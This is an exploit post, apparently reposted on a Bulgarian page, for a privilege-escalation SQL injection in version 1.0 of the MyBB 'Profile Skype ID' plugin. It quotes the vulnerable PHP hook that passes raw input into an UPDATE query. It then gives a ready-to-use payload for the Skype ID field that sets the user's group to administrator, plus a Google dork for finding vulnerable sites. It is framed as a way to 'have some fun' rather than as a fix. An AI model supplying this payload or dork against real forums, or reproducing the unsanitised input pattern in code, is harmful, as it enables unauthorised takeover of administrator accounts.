# Exploit Title: Profile Skype ID MyBB plugin privilege escalation.
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------


ProfileSkypeID plugin suffers from SQL Injection in UPDATE query.
The vulnerabillity exist within profileskype.php which located in /inc/plugins/ folder.

<?php
$plugins->add_hook("datahandler_user_update", "profileskype_update");	/*Line 15*/ 

function profileskype_update($skype) 									/*Line 167*/ 
{
  global $mybb;

  if (isset($mybb->input['skype']))
   {
      $skype->user_update_data['skype'] = $mybb->input['skype'];
   }
}

?>

How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert this following string in your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.


Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updates the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png


----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/
Rate this post
Брой прочитания на тази страница: 1247
MyBB Profile Skype ID Plugin 1.0 Privilege Escalation Vulnerability

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *